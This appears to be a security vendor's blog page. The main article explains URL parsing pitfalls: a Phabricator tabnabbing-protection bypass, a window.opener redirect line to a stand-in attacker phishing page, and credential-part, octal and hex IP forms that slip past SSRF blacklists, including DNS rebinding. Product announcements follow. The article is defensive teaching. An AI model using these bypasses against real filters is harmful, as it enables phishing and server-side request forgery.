    Sven Morgenroth
    Umran Yildirimkaya


    Tabnabbing Protection Bypass


    Since its inception, the Uniform Resource Locator (URL) has been a fundamental part of the World Wide Web. It is easily located in your current browser's address bar.

    If you were not already very familiar with URLs, it would be easy to conclude that they always start with either 'http://' or 'https://', and can't contain sensitive information. Unfortunately, this is not true.


    In this article, we'll shed light on these apparently insignificant strings, to reveal that they can be bursting with information, and we'll also examine why it's so hard to parse them correctly.

    Tabnabbing Protection Bypass

    Let's first start with a very simple URL example and why it's hard to parse them correctly. One of HackerOne's latest submissions examines a tabnabbing protection bypass for a URL parser. Phabricator is an open source management program that contained a security bug that could be abused by a rather interesting looking URL. Phabricator checks whether links added by users point to an internal resource or to another website. Those pointing to another website are treated with special care, as Phabricator adds an additional security attribute to the link. All other links (that link to internal resources) do not receive this attribute. Links that Phabricator interprets as an internal resource might look like this:

    /\example.com/some-file

    This doesn't look like a typical URL that you'd see in a browser window. So how does this work and why did Phabricator not recognize that it leads to an external website? Let's first look at the href attribute of link tags. In order to create an internal link to your website's blog, for example, your homepage must contain HTML code like this:

    <a href = "/blog/">Our Blog</a>

    This is fairly common. Browsers immediately know that you want to visit the /blog/ endpoint on the same website. However, it's also possible to do something like this:

    <a href = "//example.com/blog/">An external Blog</a>

This has the potential to cause confusion. Why are there two slashes, where you would expect 'http://' or 'https://'? The answer has to do with mixed content. When you serve your website over HTTPS, you don't want any HTTP links to appear on it. In older browser versions, including an image over HTTP risked leaking sensitive data (such as cookies); in newer browsers, the mixed content is simply blocked and the image is not displayed. This is obviously a problem.

    Let the Browser Decide Which HTTP Protocol to Use

So, imagine you want to load the image over HTTP. Your visitors go to http://yourwebsite.com/, which works fine. But once they visit the HTTPS version of your website, you run into the mixed content problem. You'd either have to replace 'http://' with 'https://' on the server side, or use JavaScript to do so. However, modern browsers can determine whether to use 'http://' or 'https://' if you give them permission to do so; you need only omit 'http:' or 'https:' from the link. What's left is the protocol-relative (two-slash) link mentioned above.

    The problem is, when you compare it to the link to your website's blog, you will see striking similarities – no 'http://', no 'https://', and it begins with a slash.

    However, it's quite common to use the above syntax. It comes as no surprise, then, that the Phabricator developers took precautions and ensured that such links were treated as external links too. However, they neglected the fact that browsers automatically convert a backslash to a forward slash if the URL begins with '/\'. This is where the vulnerability occurred and why Phabricator parsed the URL incorrectly.

    Do You Need an Effective Security Attribute?

    But what was the security attribute about? The HTML attribute that Phabricator omitted on internal links was called noreferrer. Note how it's written differently from the HTTP Referer header. This header is sent by the browser to tell the server which website contained the link that the user clicked. That means that a server can determine whether you came from https://example.com/help or https://www.netsparker.com/blog. While this has its advantages, it also comes with a risk that sensitive information can easily be leaked to the web server. Of course, passwords and session IDs don't belong in URLs, and the referrer is just one of the reasons why this is a dangerous idea. But even if they don't contain a password or a session ID, URLs can still contain information that should not be made available to the visited site.

    Let's consider an example. Imagine a customer uses a helpdesk application to open a ticket that contains a link to an article on their website. Once the employee clicks the link, they automatically send the URL of both the helpdesk application and the link, possibly containing the title of the particular ticket, to the customer.

Of course, internal helpdesk tickets may sometimes contain titles that shouldn't be shown to customers. One way to prevent the browser from sending a Referer header is via the rel attribute containing the noreferrer value. As explained before, the spelling is different from that of the HTTP header. The reason is that Phillip Hallam-Baker, the computer scientist who proposed the Referer header, spelt it wrong. Reportedly, the UNIX spellchecker at the time knew neither 'referer' nor 'referrer'. Apart from the fact that this means our browsers send one byte less per request, the spelling of this header also leads to a lot of confusion. If you add rel = "noreferer" to your link tag, it doesn't have any effect.

    So, to recap, when you add rel = "noreferrer" to your link, you prevent the browser from sending a Referer header.

    The Tabnabbing Exploit

The HackerOne submission mentions the Tabnabbing exploit a few times, which is what both the submitter and the Phabricator developer seem to be most concerned about. But what is Tabnabbing, and why does noreferrer prevent it? Here is a description of how tabnabbing works.

    Whenever you open a new tab by clicking a link whose HTML code looks like this, JavaScript will keep a reference to the window object of the site that opened the tab:

    <a href = "https://example.com/blog" target = "_blank">Blog</a>

    You are not allowed to read the location of the site that opened the tab, whether the rel = "noreferrer" attribute is set or not. However, what you can do is change the location of the opener by using the following JavaScript code:

    window.opener.location = 'https://attacker.com/phishing';

    The tabnabbing attack would happen as follows:

    1. The victim clicks a link on https://example.com/ containing target = "_blank", which leads to https://attacker.com
    2. https://attacker.com immediately redirects the tab where https://example.com/ is located to https://attacker.com/phishing
    3. The victim looks at the attacker.com page and then goes back to the previous tab containing a phishing page that looks exactly like https://example.com/, but prompts the victim to enter their login details again

    This makes a phishing attack much more effective, because the user is not expecting such behaviour and thinks they are still on the original page ('tabnabbing'). The way to thwart this attack is to use rel = "noopener", though rel = "noreferrer" has the same effect.

    It's interesting how such a small parsing mistake can have such a huge impact on the security of an application. Since we have learned how easy it is to parse URLs incorrectly, let's take a look at how hard URL parsing can actually be.

    How URLs are Structured

    A URL consists of many different parts the client must parse in order to establish a connection to the target server. In fact, URLs are just an easy way for humans to read and create links. Machines have to use a different approach.

    Scheme

This approach starts with the scheme. This is the missing part of the URL that was problematic for Phabricator. Most URLs look like http://example.com or https://example.com. However, there are many more schemes, such as ftp://, gopher:// or netdoc://. Aside from that, browsers recognise various pseudo-schemes such as javascript: or data:. It is therefore not possible to recognize an external link simply by assuming it begins with 'https://', 'http://', '//' or '/\', even though schemes like gopher:// and netdoc:// aren't available in browsers.

    Hierarchical URL Indicator

    As you might have already observed, external links contain a double slash, either immediately after the scheme or at the beginning. There is a simple difference between an internal and an external link.

    Internal Links

    Let's assume we click one of the following internal links on this website: https://example.com/about/index.html.

Link Tag → Resulting Absolute URL
<a href = "/blog">Blog</a> → https://example.com/blog
<a href = "company">Company</a> → https://example.com/about/company

    If there is a single slash at the beginning of the URL, the browser will simply replace the current path with the content of the href attribute and open that link. However, if you omit the slash, your browser will append the content of the href attribute to your current folder.

    External Links

    Here is an example of an absolute URL that leads to an external website. This will open https://www.netsparker.com regardless of your URL.

Link Tag → Resulting Absolute URL
<a href = "https://www.netsparker.com/">Netsparker</a> → https://www.netsparker.com/

    Credentials

    For HTTP Basic authentication, or for authenticating to an FTP server using your web browser and the ftp:// scheme, it is possible to specify username/password combinations. It may look something like this:

    https://username:password@example.com/

    This causes a big problem in the case of URL whitelisting that is not implemented correctly. You can simply use a URL like https://example.com@attacker.com/, which will still lead to attacker.com. However, some URL parsers could interpret it as a link to https://example.com.
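You can see the ambiguity by feeding such a URL to a real parser; PHP's parse_url() (used here purely as an illustration) treats everything before the '@' as credentials:

<?php
$parts = parse_url('https://example.com@attacker.com/');
echo $parts['host'];   // attacker.com
echo $parts['user'];   // example.com - only the username component, not the host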

    Server (Host)

The host part of the URL specifies which server the URL points to. This can be a domain like example.com, or an IPv4 or IPv6 address in different formats, such as 127.0.0.1 or [0:0:0:0:0:0:0:1]. Although classic IP notation is widely accepted, many clients that were developed using the C programming language also accept IP addresses in octal, decimal or hexadecimal format as shown:

    • http://127.0.0.1
    • http://0x7f.1/
    • http://017700000001/

    All of them point to the localhost. Not only can this be exploited in a client-side attack, but it can also bypass IP blacklists which are designed to protect internal services from Server Side Request Forgery attacks.
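A quick way to convince yourself that these notations are equivalent is to convert the underlying 32-bit value back to dotted notation, for example with PHP's long2ip() (an illustrative snippet):

<?php
// 0x7f000001 (hex) == 017700000001 (octal) == 2130706433 (decimal)
echo long2ip(0x7f000001);    // 127.0.0.1
echo long2ip(2130706433);    // 127.0.0.1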

    Port

    You can specify the Port in a URL by appending it to the domain name with a leading colon like this:

    http://example.com:8080/

    Most of the time, the value does not have to be specified. It automatically defaults to the standard port of the respective protocol.

Protocol → Default Port
https → 443
http → 80
ftp → 21

    As illustrated in the example above, it's also possible to run a server on a non-standard port. This is where the port part of the URL comes into play.

    Path

    The Path in a URL begins with a '/', and originally referred to the folder structure within the webroot. However, with many modern frameworks and REST style URLs, this is no longer always the case.

    The path is not required in order to establish a connection. Instead, it is passed to the web server after the connection has been established and specifies which document the browser wants to retrieve.

    Path Parameter

    It is possible to specify additional parameters in the path. One example is to be found in Java applications, where the JSESSIONID parameter is appended to the URL.

    https://example.com/blog.jsp;JSESSIONID=b92e8649b6cf4886241a3e0825bd36a262b24933

We have already established earlier why this is not a good idea. In IIS prior to version 6.0, this was the root cause of file upload vulnerabilities. IIS would treat a file such as shell.jsp;img.jpg as having a jsp extension with an additional parameter called img.jpg, which could easily bypass some blacklists.

    Query

The query part of a URL is where GET parameters are usually located. It begins with a question mark and can contain key/value pairs. It might look something like this:

    https://example.com/blog?action=search&author=Bob

    Fragment

    The fragment part of a URL includes everything that follows after the hash symbol. It is different from all the other URL parts, because everything that follows is not sent to the server, but is accessible by JavaScript through document.location.hash, and is also used for some browser features. Clicking a link like the one below will make the browser scroll to an HTML element with the ID 'help' on the same page, should such an element exist:

    <a href = "#help">Help</a>

    URL Parsing is Highly Complex With Lots of Parts

    I have demonstrated why URL parsing is a highly complex topic. There are lots of different parts to consider, and it's even possible for different libraries to have different methods to parse URLs.

    You can find a few great tricks on how to bypass URL parsers in Michał Zalewski's book, The Tangled Web. One example from the book looks quite complicated, but the information provided above makes it easier to understand. The URL looks like this. Can you guess where this link points to?

    http://example.com&gibberish=1234@167772161/

It's easy to assume that it will resolve to example.com. But as we've learned above, it is possible to add a credential part to the URL. This is achieved using an '@' symbol. One drawback of this method is that you can't use an unencoded slash character within the credential part. However, everything after 'http://' and before the '@' character can safely be ignored, since the browser will just remove it if no authentication is required. What we are left with is http://167772161/, which is simply the decimal (dotless integer) form of 10.0.0.1.

    The following URLs all resolve to http://example.com:

    • http://example.com/
    • http://%65xample.%63om/
    • http://%65%78%61%6d%70%6c%65%2e%63%6f%6d/

    Preventing Server Side Request Forgery is Harder Than You Think

If you do not closely follow the specifications for URL parsing, filter bypasses can occur. Preventing SSRF vulnerabilities in particular is harder than you might think. You may want to block access to localhost and 127.0.0.1, but nothing stops an attacker from registering a domain like attacker.com and pointing it to 127.0.0.1. Simply blocking URLs that contain 127.0.0.1 as the domain is therefore not sufficient.

And did you know that a URL like 127.123.123.123 points to localhost too? You should always make sure to resolve the IP of the external service and take all possible bypasses into consideration. You should never use blacklisting, only whitelisting. Mistakes are bound to happen if you aren't aware of all the ways attackers can bypass your blacklist. If your code simply won't work without one, for example if you want to retrieve data from a user-supplied external URL, keep in mind that code like this is still vulnerable, even if you have a perfect blacklist that takes every possibility into consideration:

host = 'attacker.com';
ip = getIpOf(host);                   // first DNS lookup: the attacker's DNS server returns a harmless IP
if (isBlacklisted(ip) === false) {
    response = sendRequest(host);     // second DNS lookup: the attacker's DNS server now returns 127.0.0.1
    ...
} else {
    throwError('forbidden URL detected');
}

While it may look like a secure way to prevent SSRF, it is still prone to DNS rebinding. sendRequest will most likely issue its own DNS request before it establishes a connection to the remote server. An attacker-controlled DNS server can return a harmless IP for the first DNS request, then 127.0.0.1 for the second. This is also known as a Time of Check to Time of Use (TOCTOU) problem.
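One commonly suggested mitigation, sketched below in PHP under the assumption that the allowed-host check itself is sound, is to resolve the hostname once, validate the resulting IP, and then pin the actual request to that IP so a second DNS lookup cannot change the target:

<?php
// Rough illustration only - not a complete SSRF defence.
$host = 'example.com';                  // user-supplied host, assumed already validated against a whitelist
$ip   = gethostbyname($host);           // single DNS lookup

// Reject private and reserved IP ranges.
$isPublic = filter_var($ip, FILTER_VALIDATE_IP,
    FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);

if ($isPublic === false) {
    die('forbidden URL detected');
}

// Connect to the resolved IP rather than the hostname, and send the original Host header.
$ch = curl_init('http://' . $ip . '/');
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Host: ' . $host]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);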

    The moral of the story is that even if you parse the URL correctly, you still need to take care of pitfalls that arise with the use of its respective parts.

    Netsparker and GitLab Integration


    We are pleased to announce a new function on Netsparker Enterprise, our scalable, multi-user, online web application security solution with built-in enterprise workflow and testing tools. From today, you will be able to integrate Netsparker Enterprise with GitLab, a web-based Git repository manager that provides CI/CD pipeline features.

    How the Integration of Netsparker with GitLab Works

GitLab enables you to add CI configuration to your source control repository using a single file.


GitLab uses the .gitlab-ci.yml file in the project repository for its CI/CD pipeline features. Whenever changes are pushed to that repository, GitLab reads the .gitlab-ci.yml file and executes the commands within the GitLab Runner's execution environment, in the order and with the settings described in the file.

You can integrate Netsparker Enterprise with GitLab using cURL scripts. cURL is the de facto command-line tool for transferring data with URLs. Most Linux distributions ship with cURL, GitLab's Linux runners already support it, and for GitLab's Docker runners it is easy to add to the container image if it is not already installed. This is why we chose cURL for integrating Netsparker Enterprise with GitLab: it is easy to use and widely available. Netsparker Enterprise uses the Integration Script Generator to generate cURL command-line scripts that integrate with GitLab. These scripts have been tested and approved for GitLab version 9+. In order to integrate with Netsparker Enterprise, GitLab Runner's execution environment must support cURL.

    Why the Integration of Netsparker with GitLab is Useful

    This new feature means you can generate cURL scripts with our Integration Script Generator. You can then use these cURL scripts to enable Netsparker Enterprise's advanced integration functionality.

    For further information, see Integrating Netsparker Enterprise with GitLab.

    Netsparker Announces New Application & Websites Discovery Service


    Today, we announce a new Netsparker feature, the Netsparker Radar – Application & Service Discovery Service. This feature can both discover and catalog the websites or web applications that your business has online, including those you may have forgotten. This will help you ensure that you have better security coverage for all your web applications, services, and other online collateral.

    Why We Developed Discovered Websites

Organizations may create many web applications and services over their lifetime. The prominent, public-facing ones are easy to remember, but those created long ago, or those linked in the background, are easily forgotten. This is why we developed the Discovered Websites feature: to ensure that as you work toward enhancing your security coverage, you don't leave out any crucial elements.

Once Netsparker Radar becomes aware of all your connected applications and services, it automatically begins to scan them, enabling you to continue to remediate any security risks.

    How the Discovered Websites Feature Works

A service called Netsparker Radar works independently from our Netsparker Enterprise product. It already has hundreds of millions of services in its database, and it continually scans the entire internet to find websites that might belong to you.

    Netsparker Radar

    • All you have to do is register with Netsparker Enterprise for the discovery process to start. It begins with your commercial email and makes immediate suggestions. Then, once you start adding sites, the system will start analyzing your data and make relevant suggestions.
    • All users with Manage Websites permission can configure the Service Discovery Settings that determine how online resources are 'discovered'. The Discovered Websites feature uses parameters such as IP Address or IP Range, Second Level Domain, Top Level Domain and Organization Name. Your configuration and data are analyzed, and further suggested websites are added to the list.

    Service Discovery Settings

    • All discoveries are listed in a new Discovered Websites window. From this window, you can then select to add (Create) those discoveries to a list of websites to scan. Alternatively, you can also select to Exclude or Blacklist certain websites.

    This new feature enhances your capability, enabling you to conduct a comprehensive security audit and better secure your online presence, continually reducing web application vulnerability security threats.

    For further information, see Application and Service Discovery.

The Proof-Based Scanning™ Technology in Netsparker Web Vulnerability Scanners


By automating most of the post-scan procedures with Netsparker's Proof-Based Scanning™ technology, you will have more time to fix the identified vulnerabilities and can leave the office on time.

The Netsparker web application security scanners are the first and only scanners that automatically exploit the vulnerabilities they identify during a web vulnerability scan. This Proof-Based Scanning™ technology is what sets the Netsparker scanners apart from the competition, and what enables both scanners to generate dead accurate scan results.

You can watch the video below for an introduction to the unique Proof-Based Scanning™ technology or read this document for a more detailed explanation of how this technology works and how it helps you automate most of the tedious and sometimes difficult post-scan task of verifying the identified vulnerabilities.

    If it is Exploitable, it is not a False Positive

If a vulnerability can be exploited, it is not a false positive. That is indisputable. The auto-exploitation technology is built on this concept: Netsparker finds a vulnerability and automatically exploits it. By exploiting it, it confirms that it is not a false positive. And when either Netsparker Desktop or the online web application security scanner Netsparker Cloud confirms a vulnerability, it will be marked accordingly, as seen in the screenshot below.

    Automatically Generating a Proof of the Identified Web Vulnerability

    This is where it gets interesting; the Netsparker scanners do not just automatically exploit and confirm an identified vulnerability. They also prove that the vulnerability exists by generating either a Proof of Concept or a Proof of Exploit.

    Proof of Exploit vs Proof of Concept

    Netsparker scanners will either generate a proof of exploit or a proof of concept depending on the type of the identified vulnerability. Below is an explanation of what both are and for which vulnerabilities the Netsparker scanners will generate them.

    Proof of Concept

A proof of concept is the actual exploit that can be used to prove that the vulnerability exists. For example, in the case of a cross-site scripting (XSS) vulnerability, Netsparker will generate an HTML code snippet that, when run, exploits the identified XSS. A proof of concept can be used to demonstrate and reproduce the vulnerability to a developer, giving quick insight into how an attacker can exploit this vulnerability.

    Below is a screenshot of a cross-site scripting vulnerability reported in Netsparker Cloud. Notice the Proof URL, in which Netsparker reports the URL that is used to exploit the identified vulnerability.

    Netsparker Cloud reports an identified XSS vulnerability, including the proof URL (PoC)

    Proof of Exploit

A proof of exploit is used to report the data that can be extracted from the vulnerable target once the vulnerability is exploited, highlighting the impact an exploited vulnerability can have. For example, when the Netsparker scanners identify an SQL Injection vulnerability, they extract data about the database and its setup, as shown in the screenshot below.

    SQL Injection Proof of Exploit

    The Netsparker web vulnerability scanners can generate a proof of exploit when they identify any of the below vulnerability types:

     

Benefits of Proof-Based Scanning™ Technology

The benefits of automating the post-scan process with the Proof-Based Scanning™ technology are manifold. Here are just a few:

• You do not have to manually verify the vulnerabilities the scanners find, saving precious time that you can use to fix the reported security flaws instead.
• You do not have to be a seasoned security professional to use any of the Netsparker security scanners. The results are automatically confirmed for you, so there is no need to know how to reproduce the findings.
• You can assign web application vulnerability scanning to less technical people and let the developers focus on what they do best: writing code.
• The process of finding vulnerabilities in web applications will cost you less, since you can assign the scanning tasks to less technical people.
• As a QA engineer, you won't be sent back by the developers to prove that there is a vulnerability in their code. Sounds familiar, doesn't it?
• As a developer or service provider, you do not need to convince your superior or customer to fix their issues. Just show them the proof and they will surely give you the go-ahead!

Is Proof-Based Scanning™ Technology Safe?

Yes, it is. The Netsparker web vulnerability scanners only try to exploit a vulnerability in a safe, read-only manner. For example, when exploiting an SQL injection vulnerability and generating a proof of exploit for it, they will only try to read data from the database and server. The scanners will not try to write or delete data from the database.

    End of Support for PHP 5 and PHP 7.0


At the end of 2018, the PHP project will stop releasing security updates for PHP 5.6 and PHP 7.0. Considering that millions of websites still run these old versions of PHP, this move can put them at risk. Some experts predict that flaws found in newer, supported versions of PHP might be exploitable in the older versions too, yet only the supported 7.x releases will receive security updates.


Your main defense against such risks is to upgrade to a version higher than 7.0 before the end of the year, such as PHP 7.3. To encourage users to upgrade, website content management systems need to bump up their minimum requirements, and web hosts need to develop upgrade programs to help and encourage their users to upgrade.

The biggest challenge in overcoming this problem is inertia from the big companies and developers who depend on PHP 5. For example, WordPress still supports PHP 5.2, which reached its end of life in 2011, and WordPress is used by more than a quarter of all sites on the internet. Companies fear the flood of support requests that comes with rolling out PHP version upgrades to a large number of sites.

    So make sure you update, and use systems that support the updated PHP versions. The risks of neglecting this are hacked sites, which could result in stolen user details, data breaches and massive fines of up to 4% of your turnover under GDPR legislation.
